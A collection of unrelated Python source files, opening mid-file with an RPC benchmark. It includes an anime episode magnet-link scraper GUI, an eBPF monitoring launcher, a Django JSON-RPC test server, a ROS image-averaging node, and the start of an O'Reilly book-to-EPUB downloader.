client: Client = Client("example", [{"ip": "localhost", "port": "9000"}])
@client.register()
async def test_sum(a: int, b: int) -> int:
return a + b
async def request() -> None:
for _ in range(NUM_CALLS):
await test_sum(1, 2)
loop.run_until_complete(client.start())
start: float = time.time()
loop.run_until_complete(request())
print("call: %d qps" % (NUM_CALLS / (time.time() - start)))
loop.run_until_complete(client.stop())
if __name__ == "__main__":
p = multiprocessing.Process(target=run_server)
p.start()
time.sleep(1)
run_client()
p.terminate()
|
main.py
|
import re
import time
import asyncio
import aiohttp
import json
import os, sys, subprocess, threading
from os import path
from PySide2.QtUiTools import QUiLoader
from PySide2.QtWidgets import *
from PySide2.QtCore import *
from PySide2.QtXml import QDomNode
import requests
from bs4 import BeautifulSoup
from MainWindow import Ui_MainWindow
ROOT_URL = 'http://horriblesubs.info'
ALL_SHOWS = ROOT_URL + '/shows/'
API_URL = ROOT_URL + '/api.php?method=getshows&type=show&showid={}&nextid={}'
EPISODES = list()
QUALITIES = ['1080', '720', '480']
SELECTED_SHOW = None
INTELL_PARSE = False
# NEW STUFF
SELECTED_SHOW_SAVED = None
DOWNLOAD_HISTORY = {}
DOWNLOAD_HISTORY["Downloaded"] = []
def open_magnet(magnet):
"""Open magnet according to os."""
if sys.platform.startswith('linux'):
subprocess.Popen(['xdg-open', magnet],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
elif sys.platform.startswith('win32'):
os.startfile(magnet)
elif sys.platform.startswith('cygwin'):
os.startfile(magnet)
elif sys.platform.startswith('darwin'):
subprocess.Popen(['open', magnet],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
else:
subprocess.Popen(['xdg-open', magnet],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
class AnimeShow(QListWidgetItem):
def __init__(self, show_link, title):
super().__init__(title)
self.show_link = show_link
self.title = title
def __str__(self):
return '{} - {}'.format(self.title, self.show_link)
def __repr__(self):
return '{} - {}'.format(self.title, self.show_link)
class Episode(QListWidgetItem):
def __init__(self, title, magnet, quality):
self.repr_string = '{} ({}p)'.format(title, quality)
super().__init__(self.repr_string)
self.title = title
self.magnet = magnet
self.quality = quality
def __str__(self):
return self.repr_string
def __repr__(self):
return self.repr_string
async def fetch_html(session, link):
async with session.get(link) as response:
return await response.text()
async def fetch_links(show, show_id, next_iter, quality):
async with aiohttp.ClientSession() as session:
api = API_URL.format(show_id, next_iter)
html = await fetch_html(session, api)
soup = BeautifulSoup(html, 'lxml')
if soup.body.text == 'DONE':
return
links = soup.find_all(class_='rls-info-container')
for link in links:
quality_block = link.find('div', class_='link-{}p'.format(quality))
_link = quality_block.find(title='Magnet Link')
title = '{} - {}'.format(show.get('title'), link.get('id'))
episode = Episode(title, _link.get('href'), quality)
EPISODES.append(episode)
def get_episodes(show, quality='1080'):
html = requests.get(ROOT_URL + show['href']).text
soup = BeautifulSoup(html, 'lxml')
main_div = soup.find('div', class_='entry-content')
script_block = main_div.find('script').text
show_id = re.findall('\d+', script_block)[0]
pages = 12
if(INTELL_PARSE):
api = API_URL.format(show_id, 0)
api_html = requests.get(api).text
api_soup = BeautifulSoup(api_html, 'lxml')
last_episode = int(api_soup.find('div', class_='rls-info-container').get('id'))
pages = int(last_episode/12) + 1
EPISODES.clear()
tasks = list()
loop = asyncio.new_event_loop()
for iteration in range(pages):
task = loop.create_task(fetch_links(show, show_id, iteration, quality))
tasks.append(task)
wait_tasks = asyncio.wait(tasks)
loop.run_until_complete(wait_tasks)
return sorted(EPISODES)
def matched_shows(search):
html = requests.get(ALL_SHOWS).text
soup = BeautifulSoup(html, 'lxml')
main_div = soup.find('div', class_='post-inner-content')
_matched_shows = main_div.find_all('a', title=re.compile('(?i){}'.format(search)))
result = list()
for show in _matched_shows:
anime_show = AnimeShow(show, show.text)
result.append(anime_show)
return result
class MainWindow(QMainWindow, Ui_MainWindow):
def __init__(self):
super().__init__()
self.setupUi(self)
self.loadingStatus.setVisible(False)
self.setFixedSize(self.size())
self.selectQuality.addItems(QUALITIES)
self.selectQuality.currentTextChanged.connect(self.quality_changed)
self.animeView.setSelectionMode(QAbstractItemView.ExtendedSelection)
self.animeView.doubleClicked.connect(self.display_episodes)
self.searchField.installEventFilter(self)
self.searchButton.clicked.connect(self.fill_table)
self.downloadButton.clicked.connect(self.download_selected)
self.selectAll.clicked.connect(self.select_all)
self.deselectAll.clicked.connect(self.deselect_all)
self.intellTurn.stateChanged.connect(self.intellTurn_changed)
self.save.clicked.connect(self.save_anime)
self.unsave.clicked.connect(self.unsave_anime)
self.animeView.clicked.connect(self.select_anime)
self.savedView.clicked.connect(self.select_saved)
self.autoDownload.clicked.connect(self.download_saved)
self.jsonToSaved()
def eventFilter(self, widget, event):
if event.type() == QEvent.KeyPress and widget is self.searchField:
key = event.key()
if key == Qt.Key_Return:
self.fill_table()
return QWidget.eventFilter(self, widget, event)
def fill_table(self):
global SELECTED_SHOW
SELECTED_SHOW = None
self.animeView.clear()
thread = threading.Thread(target=self.fill_table_thread)
thread.start()
self.loadingStatus.setVisible(True)
def fill_table_thread(self):
if self.searchField.text() == '':
return
shows = matched_shows(self.searchField.text())
for show in shows:
self.animeView.addItem(show)
self.loadingStatus.setVisible(False)
def display_episodes(self):
thread = threading.Thread(target=self.display_episodes_thread)
thread.start()
self.loadingStatus.setVisible(True)
def display_episodes_thread(self):
global SELECTED_SHOW
start = time.time()
selected_item = None
if(SELECTED_SHOW is None):
selected_item = self.animeView.selectedItems()[0]
SELECTED_SHOW = AnimeShow(selected_item.show_link, selected_item.title) # Save the selected show to the global scope
else:
selected_item = SELECTED_SHOW
selected_quality = self.selectQuality.currentText()
episodes = get_episodes(selected_item.show_link, selected_quality)
self.animeView.clear()
for episode in episodes:
self.animeView.addItem(episode)
print(time.time() - start)
self.loadingStatus.setVisible(False)
def quality_changed(self):
if(SELECTED_SHOW is None):
return
selected_quality = self.selectQuality.currentText()
self.animeView.clear()
self.display_episodes()
def download_selected(self):
items = self.animeView.selectedItems()
for item in items:
open_magnet(item.magnet)
def select_all(self):
self.animeView.selectAll()
def deselect_all(self):
self.animeView.clearSelection()
def intellTurn_changed(self):
global INTELL_PARSE
INTELL_PARSE = not INTELL_PARSE
# NEW STUFF
def select_anime(self):
global SELECTED_SHOW
selected_item = self.animeView.selectedItems()[0]
SELECTED_SHOW = AnimeShow(selected_item.show_link, selected_item.title) #selecting episodes probs
def select_saved(self):
global SELECTED_SHOW_SAVED
selected_item = self.savedView.selectedItems()[0]
SELECTED_SHOW_SAVED = AnimeShow(selected_item.show_link, selected_item.title)
def unsave_anime(self):
global SELECTED_SHOW_SAVED
if(SELECTED_SHOW_SAVED is None):
return
self.savedView.takeItem(self.savedView.row(self.savedView.selectedItems()[0]))
self.savedToJson()
def save_anime(self):
global SELECTED_SHOW
if(SELECTED_SHOW is None):
return
self.savedView.addItem(SELECTED_SHOW)
self.savedToJson()
def download_saved(self):
global DOWNLOAD_HISTORY
selected_quality = self.selectQuality.currentText()
toDownload = []
allEps = [[],[]]
for index in range(self.savedView.count()):
link = self.savedView.item(index).show_link
allEps[0].append(self.savedView.item(index).title)
allEps[1].append(get_episodes(link, selected_quality))
toDownload = self.checkDownloaded(allEps)
self.saveDownloadHist(allEps)
self.downloadView.clear()
if len(toDownload) is 0:
self.downloadView.addItem("No new updates!")
for episode in toDownload:
self.downloadView.addItem(episode.title)
print(episode)
open_magnet(episode.magnet)
DOWNLOAD_HISTORY = {}
DOWNLOAD_HISTORY["Downloaded"] = []
def checkDownloaded(self, allEps):
toDownload = []
if path.exists("download_history.json"):
with open("download_history.json", 'r', encoding='utf-8', errors='ignore') as json_file:
data = json.load(json_file)
for title in allEps[0]: #search for all titles
added = False
for x in range(len(data["Downloaded"])): #throughout all of the found data
if data["Downloaded"][x].get(title, "None") != "None":
for eps in allEps[1][allEps[0].index(title)]:
if str(eps) not in [str(z) for z in data["Downloaded"][x].get(title)]:
toDownload.append(eps)
break
elif (x is (len(data["Downloaded"]) - 1) and added is False):
added = True
for eps in allEps[1][allEps[0].index(title)]:
toDownload.append(eps)
return toDownload
def saveDownloadHist(self, allEps):
global DOWNLOAD_HISTORY
for i in range(len(allEps[0])):
DOWNLOAD_HISTORY["Downloaded"].append({
allEps[0][i]: tuple([str(i) for i in allEps[1][i]])
})
with open("download_history.json", "w") as outfile:
json.dump(DOWNLOAD_HISTORY, outfile, indent=4, sort_keys=True)
def savedToJson(self):
data = {}
data["Saved_Shows"] = []
for index in range(self.savedView.count()):
data["Saved_Shows"].append({
"title": self.savedView.item(index).title,
"link": str(self.savedView.item(index).show_link)
})
with open("saved.json", "w") as outfile:
json.dump(data, outfile, indent=4, sort_keys=True)
def jsonToSaved(self):
if path.exists("saved.json"):
with open("saved.json") as json_file:
data = json.load(json_file)
for anime in data["Saved_Shows"]:
link = BeautifulSoup(anime["link"],"lxml").a
self.savedView.addItem(AnimeShow(link, anime["title"]))
if __name__ == "__main__":
app = QApplication(sys.argv)
window = MainWindow()
window.show()
sys.exit(app.exec_())
|
ajtrace.py
|
#!/usr/bin/python
import argparse
import logging
import signal
import threading
import time
from ebpf_modules import ebpf_modules, Controller
from graphite import GraphiteBackend
from settings import GlobalConfig as config
controller = Controller()
def signal_handler(signum, frame):
""" Send a message to all ebpf modules to stop """
controller.stopped = True
def setup_logging():
log_level = config.get('log_level', 'info')
log_file = config.get('log_file')
level = {
'debug': logging.DEBUG,
'info': logging.INFO,
'warning': logging.WARNING,
'error': logging.ERROR,
'critical': logging.CRITICAL
}.get(log_level.lower())
if not level:
raise 'Unknown log level \'%s\'' % log_level.lower()
logging.basicConfig(filename=log_file, level=level)
def main():
parser = argparse.ArgumentParser(description='ajtrace - eBPF base monitoring tool')
parser.add_argument('-c', '--config', default='config.yml', help='config file')
args = parser.parse_args()
config.initialize(args.config)
setup_logging()
host = config.get('graphite_host', 'localhost')
port = config.get('graphite_port', 2003)
for m in config.get('modules'):
threads = []
if m.get('type') in ebpf_modules:
c = ebpf_modules[m['type']](m)
logging.info('starting \'%s\' module' % m['type'])
# create a dedicated connection for each module
storage = GraphiteBackend(host, port)
storage.connect()
thread = threading.Thread(target=c.run, args=(storage, controller, ))
thread.start()
logging.debug('thread started')
threads.append(thread)
# TODO: It looks like a race condition occures when two modules are
# installed simultaniously. Should think of a better solution.
time.sleep(1)
else:
raise 'Unknown module type \'%\'' % m.get('type')
signal.signal(signal.SIGINT, signal_handler)
signal.signal(signal.SIGTERM, signal_handler)
# wait for Ctrl+C
while 1:
time.sleep(1)
if controller.stopped:
break
logging.info('stopping all threads')
for t in threads:
t.join()
logging.info('done')
if __name__ == '__main__':
main()
|
utils.py
|
import threading
from django.contrib.auth.models import User
from django.core import management
from jsonrpc._json import loads, dumps
from six.moves.urllib import request as urllib_request
from six.moves.urllib import parse as urllib_parse
from jsonrpc.proxy import ServiceProxy
TEST_DEFAULTS = {
'ROOT_URLCONF': 'test.jsontesturls',
'DEBUG': True,
'DEBUG_PROPAGATE_EXCEPTIONS': True,
'DATETIME_FORMAT': 'N j, Y, P',
'USE_I18N': False,
'INSTALLED_APPS': (
'jsonrpc',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions'),
'DATABASES': {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': 'test.sqlite3',
},
},
'MIDDLEWARE_CLASSES': (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
),
'AUTHENTICATION_BACKENDS': ('django.contrib.auth.backends.ModelBackend',),
'TEMPLATE_LOADERS': (
'django.template.loaders.filesystem.load_template_source',
'django.template.loaders.app_directories.load_template_source'),
}
from django.conf import settings
settings.configure(**TEST_DEFAULTS)
import django
if hasattr(django, 'setup'):
# Run django.setup() for Django>=1.7
django.setup()
def _call(host, req):
return loads(urllib_request.urlopen(host, dumps(req).encode('utf-8')).read().decode('utf-8'))
class JsonServer(object):
def _thread_body(self):
try:
from wsgiref.simple_server import make_server
from django.core.handlers.wsgi import WSGIHandler
management.call_command('migrate', interactive=False)
try:
User.objects.create_user(username='rishi', email='rishijha424@gmail.com', password='password').save()
except Exception:
pass
http = make_server('', 8999, WSGIHandler())
print('Server created. continue={0}'.format(self.continue_serving))
self.event.set() # notify parent thread that the server is ready to serve requests
while self.continue_serving:
print('Waiting for request!')
http.handle_request()
self.n_requests += 1
print('Handled {0} requests!'.format(self.n_requests))
print('Got server stop! requests={0}'.format(self.n_requests))
http.server_close()
print('Server closed!')
except Exception as e:
import traceback
traceback.print_exc()
print('Error starting server: {0}'.format(e))
finally:
if not self.event.is_set():
self.event.set()
def start(self):
print('Starting Server...')
self.continue_serving = True
self.n_requests = 0
self.event = threading.Event()
self.t = threading.Thread(target=self._thread_body)
self.t.start()
self.event.wait()
return self
def stop(self):
print('Stopping Server...')
self.continue_serving = False
try:
proxy = ServiceProxy('http://127.0.0.1:8999/json/', version=2.0)
proxy.jsonrpc.test(string='Hello')['result']
except: # doesnt matter if this fails
pass
self.t.join(2.0)
return self
|
image_average_tristan_node.py
|
#!/usr/bin/env python
from __future__ import division
import rospy
import cv2
from cv_bridge import CvBridge, CvBridgeError
from sensor_msgs.msg import CompressedImage, Image
import numpy as np
import threading
class ImageAverageNode(object):
def __init__(self):
self.node_name = "Image Average"
# Thread lock
self.thread_lock = threading.Lock()
self.bridge = CvBridge()
# Publishers
self.pub_image = rospy.Publisher("~average_image", Image, queue_size=1)
self.cma_image = []
self.img_seq = 0
# Verbose option
#self.verbose = rospy.get_param('~verbose')
self.verbose = False
#if self.verbose:
# self.toc_pre = rospy.get_time()
# Subscribers
self.sub_image = rospy.Subscriber("~image", CompressedImage, self.cbImage, queue_size=1)
rospy.loginfo("[%s] Initialized." %(self.node_name))
def cbImage(self,image_msg):
# Start a daemon thread to process the image
thread = threading.Thread(target=self.processImage,args=(image_msg,))
thread.setDaemon(True)
thread.start()
# Returns rightaway
def processImage(self,image_msg):
if not self.thread_lock.acquire(False):
# Return immediately if the thread is locked
return
# Verbose
if self.verbose:
rospy.loginfo("[%s] Latency received = %.3f ms" %(self.node_name, (rospy.get_time()-image_msg.header.stamp.to_sec()) * 1000.0))
# Decode from compressed image
# with OpenCV
image_cv = cv2.imdecode(np.fromstring(image_msg.data, np.uint8), cv2.CV_LOAD_IMAGE_COLOR)
# Verbose
if self.verbose:
self.tic = rospy.get_time()
rospy.loginfo("[%s] Latency image decompressed = %.3f ms" %(self.node_name, (self.tic-image_msg.header.stamp.to_sec()) * 1000.0))
# Process image here
if (self.img_seq == 0):
self.cma_image = image_cv
self.img_seq = 1
else:
self.cma_image = self.cma_image + (image_cv - self.cma_image) * (1.0 / (self.img_seq+1))
self.img_seq += 1
# Publish the frame with lines
image_msg_out = self.bridge.cv2_to_imgmsg(self.cma_image.astype(np.uint8), "bgr8")
image_msg_out.header.stamp = image_msg.header.stamp
self.pub_image.publish(image_msg_out)
# Verbose
if self.verbose:
rospy.loginfo("[%s] Latency sent = %.3f ms" %(self.node_name, (rospy.get_time()-image_msg.header.stamp.to_sec()) * 1000.0))
# Release the thread lock
self.thread_lock.release()
def onShutdown(self):
rospy.loginfo("[VirtualMirrorNode] Shutdown.")
if __name__ == '__main__':
rospy.init_node('image_average_tristan_node',anonymous=False)
image_average_node = ImageAverageNode()
rospy.on_shutdown(image_average_node.onShutdown)
rospy.spin()
|
safaribooks.py
|
#!/usr/bin/env python3
# coding: utf-8
import pathlib
import re
import os
import sys
import json
import shutil
import getpass
import logging
import argparse
import requests
import traceback
from html import escape
from random import random
from lxml import html, etree
from multiprocessing import Process, Queue, Value
from urllib.parse import urljoin, urlparse, parse_qs, quote_plus
PATH = os.path.dirname(os.path.realpath(__file__))
COOKIES_FILE = os.path.join(PATH, "cookies.json")
ORLY_BASE_HOST = "oreilly.com" # PLEASE INSERT URL HERE
SAFARI_BASE_HOST = "learning." + ORLY_BASE_HOST
API_ORIGIN_HOST = "api." + ORLY_BASE_HOST
ORLY_BASE_URL = "https://www." + ORLY_BASE_HOST
SAFARI_BASE_URL = "https://" + SAFARI_BASE_HOST
API_ORIGIN_URL = "https://" + API_ORIGIN_HOST
PROFILE_URL = SAFARI_BASE_URL + "/profile/"
# DEBUG
USE_PROXY = False
PROXIES = {"https": "https://127.0.0.1:8080"}
class Display:
BASE_FORMAT = logging.Formatter(
fmt="[%(asctime)s] %(message)s",
datefmt="%d/%b/%Y %H:%M:%S"
)
SH_DEFAULT = "\033[0m" if "win" not in sys.platform else "" # TODO: colors for Windows
SH_YELLOW = "\033[33m" if "win" not in sys.platform else ""
SH_BG_RED = "\033[41m" if "win" not in sys.platform else ""
SH_BG_YELLOW = "\033[43m" if "win" not in sys.platform else ""
def __init__(self, log_file):
self.output_dir = ""
self.output_dir_set = False
self.log_file = os.path.join(PATH, log_file)
self.logger = logging.getLogger("SafariBooks")
self.logger.setLevel(logging.INFO)
logs_handler = logging.FileHandler(filename=self.log_file)
logs_handler.setFormatter(self.BASE_FORMAT)
logs_handler.setLevel(logging.INFO)
self.logger.addHandler(logs_handler)
self.columns, _ = shutil.get_terminal_size()
self.logger.info("** Welcome to SafariBooks! **")
self.book_ad_info = False
self.css_ad_info = Value("i", 0)
self.images_ad_info = Value("i", 0)
self.last_request = (None,)
self.in_error = False
self.state_status = Value("i", 0)
sys.excepthook = self.unhandled_exception
def set_output_dir(self, output_dir):
self.info("Output directory:\n %s" % output_dir)
self.output_dir = output_dir
self.output_dir_set = True
def unregister(self):
self.logger.handlers[0].close()
sys.excepthook = sys.__excepthook__
def log(self, message):
try:
self.logger.info(str(message, "utf-8", "replace"))
except (UnicodeDecodeError, Exception):
self.logger.info(message)
def out(self, put):
pattern = "\r{!s}\r{!s}\n"
try:
s = pattern.format(" " * self.columns, str(put, "utf-8", "replace"))
except TypeError:
s = pattern.format(" " * self.columns, put)
sys.stdout.write(s)
def info(self, message, state=False):
self.log(message)
output = (self.SH_YELLOW + "[*]" + self.SH_DEFAULT if not state else
self.SH_BG_YELLOW + "[-]" + self.SH_DEFAULT) + " %s" % message
self.out(output)
def error(self, error):
if not self.in_error:
self.in_error = True
self.log(error)
output = self.SH_BG_RED + "[#]" + self.SH_DEFAULT + " %s" % error
self.out(output)
def exit(self, error):
self.error(str(error))
if self.output_dir_set:
output = (self.SH_YELLOW + "[+]" + self.SH_DEFAULT +
" Please delete the output directory '" + self.output_dir + "'"
" and restart the program.")
self.out(output)
output = self.SH_BG_RED + "[!]" + self.SH_DEFAULT + " Aborting..."
self.out(output)
self.save_last_request()
sys.exit(1)
def unhandled_exception(self, _, o, tb):
self.log("".join(traceback.format_tb(tb)))
self.exit("Unhandled Exception: %s (type: %s)" % (o, o.__class__.__name__))
def save_last_request(self):
if any(self.last_request):
self.log("Last request done:\n\tURL: {0}\n\tDATA: {1}\n\tOTHERS: {2}\n\n\t{3}\n{4}\n\n{5}\n"
.format(*self.last_request))
def intro(self):
output = self.SH_YELLOW + ("""
____ ___ _
/ __/__ _/ _/__ _____(_)
_\ \/ _ `/ _/ _ `/ __/ /
/___/\_,_/_/ \_,_/_/ /_/
/ _ )___ ___ / /__ ___
/ _ / _ \/ _ \/ '_/(_-<
/____/\___/\___/_/\_\/___/
""" if random() > 0.5 else """
██████╗ ██████╗ ██╗ ██╗ ██╗██████╗
██╔═══██╗ ██╔══██╗██║ ╚██╗ ██╔╝╚════██╗
██║ ██║ ██████╔╝██║ ╚████╔╝ ▄███╔╝
██║ ██║ ██╔══██╗██║ ╚██╔╝ ▀▀══╝
╚██████╔╝ ██║ ██║███████╗██║ ██╗
╚═════╝ ╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝
""") + self.SH_DEFAULT
output += "\n" + "~" * (self.columns // 2)
self.out(output)
def parse_description(self, desc):
if not desc:
return "n/d"
try:
return html.fromstring(desc).text_content()
except (html.etree.ParseError, html.etree.ParserError) as e:
self.log("Error parsing the description: %s" % e)
return "n/d"
def book_info(self, info):
description = self.parse_description(info.get("description", None)).replace("\n", " ")
for t in [
("Title", info.get("title", "")), ("Authors", ", ".join(aut.get("name", "") for aut in info.get("authors", []))),
("Identifier", info.get("identifier", "")), ("ISBN", info.get("isbn", "")),
("Publishers", ", ".join(pub.get("name", "") for pub in info.get("publishers", []))),
("Rights", info.get("rights", "")),
("Description", description[:500] + "..." if len(description) >= 500 else description),
("Release Date", info.get("issued", "")),
("URL", info.get("web_url", ""))
]:
self.info("{0}{1}{2}: {3}".format(self.SH_YELLOW, t[0], self.SH_DEFAULT, t[1]), True)
def state(self, origin, done):
progress = int(done * 100 / origin)
bar = int(progress * (self.columns - 11) / 100)
if self.state_status.value < progress:
self.state_status.value = progress
sys.stdout.write(
"\r " + self.SH_BG_YELLOW + "[" + ("#" * bar).ljust(self.columns - 11, "-") + "]" +
self.SH_DEFAULT + ("%4s" % progress) + "%" + ("\n" if progress == 100 else "")
)
def done(self, epub_file):
self.info("Done: %s\n\n" % epub_file +
" If you like it, please * this project on GitHub to make it known:\n"
" https://github.com/lorenzodifuccia/safaribooks\n"
" e don't forget to renew your Safari Books Online subscription:\n"
" " + SAFARI_BASE_URL + "\n\n" +
self.SH_BG_RED + "[!]" + self.SH_DEFAULT + " Bye!!")
@staticmethod
def api_error(response):
message = "API: "
if "detail" in response and "Not found" in response["detail"]:
message += "book's not present in Safari Books Online.\n" \
" The book identifier is the digits that you can find in the URL:\n" \
" `" + SAFARI_BASE_URL + "/library/view/book-name/XXXXXXXXXXXXX/`"
else:
os.remove(COOKIES_FILE)
message += "Out-of-Session%s.\n" % (" (%s)" % response["detail"]) if "detail" in response else "" + \
Display.SH_YELLOW + "[+]" + Display.SH_DEFAULT + \
" Use the `--cred` or `--login` options in order to perform the auth login to Safari."
return message
class WinQueue(list): # TODO: error while use `process` in Windows: can't pickle _thread.RLock objects
def put(self, el):
self.append(el)
def qsize(self):
return self.__len__()
class SafariBooks:
LOGIN_URL = ORLY_BASE_URL + "/member/auth/login/"
LOGIN_ENTRY_URL = SAFARI_BASE_URL + "/login/unified/?next=/home/"
API_TEMPLATE = SAFARI_BASE_URL + "/api/v1/book/{0}/"
BASE_01_HTML = "<!DOCTYPE html>\n" \
"<html lang=\"en\" xml:lang=\"en\" xmlns=\"http://www.w3.org/1999/xhtml\"" \
" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"" \
" xsi:schemaLocation=\"http://www.w3.org/2002/06/xhtml2/" \
" http://www.w3.org/MarkUp/SCHEMA/xhtml2.xsd\"" \
" xmlns:epub=\"http://www.idpf.org/2007/ops\">\n" \
"<head>\n" \
"{0}\n" \
"<style type=\"text/css\">" \
"body{{margin:1em;background-color:transparent!important;}}" \
"#sbo-rt-content *{{text-indent:0pt!important;}}#sbo-rt-content .bq{{margin-right:1em!important;}}"
KINDLE_HTML = "#sbo-rt-content *{{word-wrap:break-word!important;" \
"word-break:break-word!important;}}#sbo-rt-content table,#sbo-rt-content pre" \
"{{overflow-x:unset!important;overflow:unset!important;" \
"overflow-y:unset!important;white-space:pre-wrap!important;}}"
BASE_02_HTML = "</style>" \
"</head>\n" \
"<body>{1}</body>\n</html>"
CONTAINER_XML = "<?xml version=\"1.0\"?>" \
"<container version=\"1.0\" xmlns=\"urn:oasis:names:tc:opendocument:xmlns:container\">" \
"<rootfiles>" \
"<rootfile full-path=\"OEBPS/content.opf\" media-type=\"application/oebps-package+xml\" />" \
"</rootfiles>" \
"</container>"
# Format: ID, Title, Authors, Description, Subjects, Publisher, Rights, Date, CoverId, MANIFEST, SPINE, CoverUrl
CONTENT_OPF = "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n" \
"<package xmlns=\"http://www.idpf.org/2007/opf\" unique-identifier=\"bookid\" version=\"2.0\" >\n" \
"<metadata xmlns:dc=\"http://purl.org/dc/elements/1.1/\" " \
" xmlns:opf=\"http://www.idpf.org/2007/opf\">\n" \
"<dc:title>{1}</dc:title>\n" \
"{2}\n" \
"<dc:description>{3}</dc:description>\n" \
"{4}" \
"<dc:publisher>{5}</dc:publisher>\n" \
"<dc:rights>{6}</dc:rights>\n" \
"<dc:language>en-US</dc:language>\n" \
"<dc:date>{7}</dc:date>\n" \
"<dc:identifier id=\"bookid\">{0}</dc:identifier>\n" \
"<meta name=\"cover\" content=\"{8}\"/>\n" \
"</metadata>\n" \
"<manifest>\n" \
"<item id=\"ncx\" href=\"toc.ncx\" media-type=\"application/x-dtbncx+xml\" />\n" \
"{9}\n" \
"</manifest>\n" \
"<spine toc=\"ncx\">\n{10}</spine>\n" \
"<guide><reference href=\"{11}\" title=\"Cover\" type=\"cover\" /></guide>\n" \
"</package>"
# Format: ID, Depth, Title, Author, NAVMAP
TOC_NCX = "<?xml version=\"1.0\" encoding=\"utf-8\" standalone=\"no\" ?>\n" \
"<!DOCTYPE ncx PUBLIC \"-//NISO//DTD ncx 2005-1//EN\"" \
" \"http://www.daisy.org/z3986/2005/ncx-2005-1.dtd\">\n" \
"<ncx xmlns=\"http://www.daisy.org/z3986/2005/ncx/\" version=\"2005-1\">\n" \
"<head>\n" \
"<meta content=\"ID:ISBN:{0}\" name=\"dtb:uid\"/>\n" \
"<meta content=\"{1}\" name=\"dtb:depth\"/>\n" \
"<meta content=\"0\" name=\"dtb:totalPageCount\"/>\n" \
"<meta content=\"0\" name=\"dtb:maxPageNumber\"/>\n" \
"</head>\n" \
"<docTitle><text>{2}</text></docTitle>\n" \
"<docAuthor><text>{3}</text></docAuthor>\n" \
"<navMap>{4}</navMap>\n" \
"</ncx>"
HEADERS = {
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8",
"Accept-Encoding": "gzip, deflate",
"Referer": LOGIN_ENTRY_URL,
"Upgrade-Insecure-Requests": "1",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) "
"Chrome/80.0.3987.163 Safari/537.36"
}
COOKIE_FLOAT_MAX_AGE_PATTERN = re.compile(r'(max-age=\d*\.\d*)', re.IGNORECASE)
def __init__(self, args):
self.args = args
self.display = Display("info_%s.log" % escape(args.bookid))
self.display.intro()
self.session = requests.Session()
if USE_PROXY: # DEBUG
self.session.proxies = PROXIES
self.session.verify = False
self.session.headers.update(self.HEADERS)
self.jwt = {}
if not args.cred:
if not os.path.isfile(COOKIES_FILE):
self.display.exit("Login: unable to find `cookies.json` file.\n"
" Please use the `--cred` or `--login` options to perform the login.")
self.session.cookies.update(json.load(open(COOKIES_FILE)))
else:
self.display.info("Logging into Safari Books Online...", state=True)
self.do_login(*args.cred)
if not args.no_cookies:
json.dump(self.session.cookies.get_dict(), open(COOKIES_FILE, 'w'))
self.check_login()
self.book_id = args.bookid
self.api_url = self.API_TEMPLATE.format(self.book_id)
self.display.info("Retrieving book info...")
self.book_info = self.get_book_info()
self.display.book_info(self.book_info)
self.display.info("Retrieving book chapters...")
self.book_chapters = self.get_book_chapters()
self.chapters_queue = self.book_chapters[:]
if len(self.book_chapters) > sys.getrecursionlimit():
sys.setrecursionlimit(len(self.book_chapters))
self.book_title = self.book_info["title"]
self.base_url = self.book_info["web_url"]
self.clean_book_title = "".join(self.escape_dirname(self.book_title).split(",")[:2]) \
+ " ({0})".format(self.book_id)
books_dir = os.path.join(PATH, "Books")
if not os.path.isdir(books_dir):
os.mkdir(books_dir)
self.BOOK_PATH = os.path.join(books_dir, self.clean_book_title)
self.display.set_output_dir(self.BOOK_PATH)
self.css_path = ""
self.images_path = ""
self.create_dirs()
self.chapter_title = ""
self.filename = ""
self.chapter_stylesheets = []
self.css = []
self.images = []
self.display.info("Downloading book contents... (%s chapters)" % len(self.book_chapters), state=True)
self.BASE_HTML = self.BASE_01_HTML + (self.KINDLE_HTML if not args.kindle else "") + self.BASE_02_HTML
self.cover = False
self.get()
if not self.cover:
self.cover = self.get_default_cover()
cover_html = self.parse_html(
html.fromstring("<div id=\"sbo-rt-content\"><img src=\"Images/{0}\"></div>".format(self.cover)), True
)
self.book_chapters = [{
"filename": "default_cover.xhtml",
"title": "Cover"
}] + self.book_chapters
self.filename = self.book_chapters[0]["filename"]
self.save_page_html(cover_html)
self.css_done_queue = Queue(0) if "win" not in sys.platform else WinQueue()
self.display.info("Downloading book CSSs... (%s files)" % len(self.css), state=True)
self.collect_css()
self.images_done_queue = Queue(0) if "win" not in sys.platform else WinQueue()
self.display.info("Downloading book images... (%s files)" % len(self.images), state=True)
self.collect_images()
self.display.info("Creating EPUB file...", state=True)
self.create_epub()
if not args.no_cookies:
json.dump(self.session.cookies.get_dict(), open(COOKIES_FILE, "w"))
self.display.done(os.path.join(self.BOOK_PATH, self.book_id + ".epub"))
self.display.unregister()
if not self.display.in_error and not args.log:
os.remove(self.display.log_file)
def handle_cookie_update(self, set_cookie_headers):
for morsel in set_cookie_headers:
# Handle Float 'max-age' Cookie
if self.COOKIE_FLOAT_MAX_AGE_PATTERN.search(morsel):
cookie_key, cookie_value = morsel.split(";")[0].split("=")
self.session.cookies.set(cookie_key, cookie_value)
def requests_provider(self, url, is_post=False, data=None, perform_redirect=True, **kwargs):
try:
response = getattr(self.session, "post" if is_post else "get")(
url,
data=data,
allow_redirects=False,
**kwargs
)
self.handle_cookie_update(response.raw.headers.getlist("Set-Cookie"))
self.display.last_request = (
url, data, kwargs, response.status_code, "\n".join(
["\t{}: {}".format(*h) for h in response.headers.items()]
), response.text
)
except (requests.ConnectionError, requests.ConnectTimeout, requests.RequestException) as request_exception:
self.display.error(str(request_exception))
return 0
if response.is_redirect and perform_redirect:
return self.requests_provider(response.next.url, is_post, None, perform_redirect)
# TODO How about **kwargs?
return response
@staticmethod
def parse_cred(cred):
if ":" not in cred:
